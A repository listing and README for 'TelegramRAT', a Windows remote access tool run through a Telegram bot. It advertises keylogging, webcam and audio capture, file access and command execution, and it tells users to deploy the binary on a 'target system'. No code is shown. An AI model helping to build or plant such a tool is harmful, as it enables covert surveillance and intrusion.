https://github.com/xeintdm/telegramrat
Telegram Remote Access Tool
https://github.com/xeintdm/telegramrat
administration csharp dotnet rat remote-access remote-control telegram telegram-bot telegram-rat tg-rat windows
Last synced: 3 months ago
JSON representation
Telegram Remote Access Tool
- Host: GitHub
- URL: https://github.com/xeintdm/telegramrat
- Owner: XeinTDM
- License: unlicense
- Created: 2025-01-21T14:20:14.000Z (5 months ago)
- Default Branch: main
- Last Pushed: 2025-01-21T14:33:11.000Z (5 months ago)
- Last Synced: 2025-03-22T02:13:28.699Z (3 months ago)
- Topics: administration, csharp, dotnet, rat, remote-access, remote-control, telegram, telegram-bot, telegram-rat, tg-rat, windows
- Language: C#
- Homepage: https://guns.lol/xein
- Size: 36.1 KB
- Stars: 1
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# TelegramRAT
**Telegram Remote Access Tool**
A modern and optimized administration tool for Windows, accessible via your personal Telegram bot. Built for educational and administrative purposes, this tool offers robust features to interact with and control Windows systems remotely.## Features
- **Keyboard and Mouse Input Simulation**
- **File System Access**
- Upload, download, delete, and manage files.
- **CMD Command Execution**
- **Python Scripting**
- Execute Python scripts directly.
- **Audio and Video**
- Record audio and capture webcam photos.
- **System Control**
- Shutdown, restart, logoff, monitor power control, etc.
- **Monitoring**
- Keylogging (educational use only).
- **Miscellaneous**
- Screenshot capturing, URL opening, and more.For a full list of available commands, use the `/commands` bot command or click on the `Show All Commands` button.
## Requirements
- **Platform:** Windows 7+
- **Framework:** .NET 8
- **Telegram Bot:** Create one [here](https://core.telegram.org/bots).## Improvements Over the Original
This version is based on the [Garneg's TelegramRAT](https://github.com/Garneg/TelegramRAT), with significant enhancements:
- Updated to **.NET 8** for better performance and support.
- Optimized and refactored the entire codebase.
- Improved stability and error handling.
- Enhanced security practices.
- Streamlined the command architecture for easier extension.
- Updated all the third-party libraries.## Setup
1. Clone the repository:
```bash
git clone https://github.com/XeinTDM/TelegramRAT.git
```
2. Configure your bot token and owner ID in `Program.cs`:
```csharp
private static readonly string BotToken = "YOUR_TELEGRAM_BOT_TOKEN";
private static readonly long? OwnerId = null;
```
3. Build the project using Visual Studio or any compatible IDE.
4. Deploy the compiled binary on the target system.
5. Start the application and control it through your Telegram bot.## License
This project is licensed under the [The Unlicense](LICENSE), granting you the freedom to use, modify, and distribute the code as you see fit.
## Disclaimer
> **This tool is for educational and ethical purposes only.**
> Using this software maliciously or in violation of any laws is strictly prohibited.
> **The author is not responsible for any misuse or damage caused by this code.**
> Ensure you have proper authorization before using this tool on any system.By using this tool, you agree to take full responsibility for your actions.